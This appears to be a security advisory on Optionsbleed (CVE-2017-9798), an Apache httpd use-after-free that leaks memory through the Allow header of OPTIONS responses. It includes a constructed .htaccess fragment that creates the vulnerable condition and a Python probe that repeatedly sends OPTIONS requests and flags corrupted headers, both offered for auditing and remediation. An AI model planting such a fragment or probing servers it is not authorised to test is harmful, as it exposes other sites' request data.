Introduction:
We all know about Heartbleed in OpenSSL, where a malformed request makes the target server respond with more data than was asked for. Instead of rejecting the request, the server answers with memory contents that were never intended for the client. A bug of a similar flavour was found recently, not in OpenSSL but in httpd, the server program of the Apache HTTP Server project.
This vulnerability has been named 'Optionsbleed', because the information leaks when we send a request to a vulnerable Apache server using the HTTP OPTIONS method. Let us take a deeper look at this bug, which has been designated CVE-2017-9798.

Background:
The HTTP OPTIONS method tells us which HTTP methods the target server allows for a resource. When we send an OPTIONS request, the server lists the permitted methods in the 'Allow:' response header. For example:

HTTP/1.1 200 OK
Allow: OPTIONS, TRACE, GET, HEAD, POST, PUT
Public: OPTIONS, TRACE, GET, HEAD, POST, PUT
Content-Length: 0
Date: Wed, 20 Sep 2017 15:08:56 GMT

During a scan of a large number of web servers, researcher Hanno Böck observed that some of them answered OPTIONS requests with corrupted Allow headers, such as:

Allow: GET,HEAD,OPTIONS,, HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST, HEAD,!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"

Empty list entries, repeated methods and a fragment of an HTML document type declaration in a header that should contain nothing but method names are a clear sign that the server is copying freed or uninitialised memory into its response, a 'bleed' style information disclosure. The hosts that produced such responses were all running particular versions of Apache httpd, which pointed at a bug in the server itself rather than in any site's application code.

What is actually happening?
In an Apache .htaccess file (or in the main configuration) the 'Limit' section directive restricts the access-control directives inside it to specific HTTP methods, so that, for example, POST can be denied to some users while GET remains allowed.
If an administrator, or an attacker who can write a .htaccess file on the server, creates a 'Limit' section for a method name that Apache does not recognise, the memory corruption is triggered. Apache frees the memory holding that unrecognised method name but keeps a reference to it, a classic use-after-free. By the time an HTTP OPTIONS request arrives and Apache builds the 'Allow' header, that freed memory has usually been reused by the same httpd process for other data, so the header echoes fragments of whatever now lives there: pieces of other requests and responses, possibly belonging to other sites hosted on the same server. The leak is not deterministic; what comes back depends on how the freed memory was reused, so an attacker typically sends many OPTIONS requests and collects the results. On a server without such a misconfigured 'Limit' section nothing leaks, but on shared hosting any customer who can upload a .htaccess file can create the condition and read memory of the shared httpd process.

Affected Versions:
· Apache HTTP Server 2.2.34 and earlier.
· Apache HTTP Server 2.4.27 and earlier.
The fix shipped in httpd 2.4.28; the 2.2 branch had already reached end of life, so only a source patch was published for it.

Recommendations:
· Apply the patches available for your server, and make sure you are running an unaffected version.
· Check every .htaccess file (and the main configuration) of locally hosted Apache servers for 'Limit' sections that name methods Apache does not know, and correct or remove them; review 'LimitExcept' sections the same way.
· On shared hosting, restrict what customers may place in .htaccess; if per-directory overrides are not needed, set 'AllowOverride None' so that .htaccess files are ignored altogether.
· Before applying the patch, make sure that no unauthorised modifications of the system have been made.
· Regularly validate what kind of content is being uploaded to the server.
· Run all software as a least-privilege user.
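As an added, constructed example (not taken from the page or from the Apache project), this is the shape of a .htaccess fragment that creates the condition described above on an unpatched server, next to the corrected configuration and the server-level setting that stops .htaccess files from being read at all. The method name 'abcde' is an arbitrary placeholder, and the directives inside the sections use httpd 2.4 syntax.

```apache
# --- Triggering fragment (constructed example, do not deploy) ---
# "abcde" is not an HTTP method httpd knows about. On an unpatched
# 2.2.x / 2.4.x server this section is accepted silently and sets up
# the use-after-free that OPTIONS requests later read from.
<Limit abcde>
    Require all denied
</Limit>

# --- Corrected fragment ---
# Only name methods httpd actually registers. To deny everything except
# a fixed set of methods, <LimitExcept> expresses that without listing
# any unknown names.
<LimitExcept GET HEAD POST OPTIONS>
    Require all denied
</LimitExcept>

# --- Server-level mitigation (main configuration, not .htaccess) ---
# With overrides disabled, .htaccess files under this directory are never
# parsed, so a customer on shared hosting cannot plant the section above.
<Directory "/var/www/vhosts">
    AllowOverride None
</Directory>
```

A plain syntax check does not catch the first fragment, because the unrecognised method is accepted rather than rejected; the audit has to look at the method names inside each Limit section, not just at whether the configuration loads.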
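The corrupted 'Allow' header shown in the Background section can be checked for mechanically, which is how you would confirm that a patch or configuration change actually closed the leak. The following probe is an added example written for this article; it is not code from the page or from Hanno Böck's published tooling. It assumes a host name given on the command line, sends repeated OPTIONS requests with the standard library, and flags any Allow value that is not a clean list of distinct HTTP method tokens. The two sample header values are constructed (the corrupt one mirrors the example above) so the parser can be exercised offline.

```python
"""Probe a web server for Optionsbleed-style corruption of the Allow header.

Added example, not part of the original article or of Apache httpd.
"""
import http.client
import re
import sys

# RFC 7230 "token" characters. A sane Allow header is a comma-separated
# list of method names made only of these characters.
_TOKEN = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")

# Constructed sample values: a healthy header and the corrupted shape
# observed on vulnerable servers.
SAMPLE_CLEAN = "OPTIONS, TRACE, GET, HEAD, POST, PUT"
SAMPLE_CORRUPT = (
    "GET,HEAD,OPTIONS,, HEAD,,HEAD,, HEAD,,HEAD,,HEAD,,HEAD,POST, HEAD,"
    '!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"'
)


def allow_anomalies(value):
    """Return a list of anomalies found in an Allow header value.

    An empty list means the value looks like a normal method list. Freed
    memory leaking into the header shows up as empty list elements,
    repeated methods, or elements containing non-token characters such as
    spaces, quotes or '<'.
    """
    anomalies = []
    seen = set()
    for raw in value.split(","):
        elem = raw.strip()
        if elem == "":
            anomalies.append("empty element")
        elif not _TOKEN.match(elem):
            anomalies.append("non-token element: %r" % elem[:40])
        elif elem in seen:
            anomalies.append("duplicate method: %s" % elem)
        else:
            seen.add(elem)
    return anomalies


def probe(host, path="/", port=None, attempts=100, use_tls=False, timeout=10):
    """Send repeated OPTIONS requests and collect anomalous Allow headers.

    The leak is non-deterministic (it depends on what the freed memory was
    reused for), so one request proves nothing; repeat it many times.
    Returns a list of (attempt_number, allow_value, anomalies) tuples.
    A fresh connection is opened per attempt so that each request starts
    from a clean state.
    """
    findings = []
    for n in range(1, attempts + 1):
        if use_tls:
            conn = http.client.HTTPSConnection(host, port, timeout=timeout)
        else:
            conn = http.client.HTTPConnection(host, port, timeout=timeout)
        try:
            conn.request("OPTIONS", path, headers={"Host": host})
            resp = conn.getresponse()
            resp.read()  # drain the body so the connection closes cleanly
            allow = resp.getheader("Allow")
        finally:
            conn.close()
        if allow is None:
            continue  # no Allow header at all: nothing to judge on this attempt
        anomalies = allow_anomalies(allow)
        if anomalies:
            findings.append((n, allow, anomalies))
    return findings


if __name__ == "__main__":
    print("clean   :", allow_anomalies(SAMPLE_CLEAN))
    print("corrupt :", allow_anomalies(SAMPLE_CORRUPT)[:5], "...")
    if len(sys.argv) > 1:
        # Usage: python optionsbleed_probe.py <host> [--tls]
        for n, allow, problems in probe(sys.argv[1], use_tls="--tls" in sys.argv):
            print("attempt %d: %r -> %s" % (n, allow, problems))
```

Treat a hit as a signal to inspect, not as proof on its own: a server that legitimately sends an unusual but valid Allow list will not trip the token check, but a front-end proxy or application framework that writes its own odd Allow values can produce false positives. What cannot be explained by configuration, in particular HTML or header fragments inside Allow, is the leak.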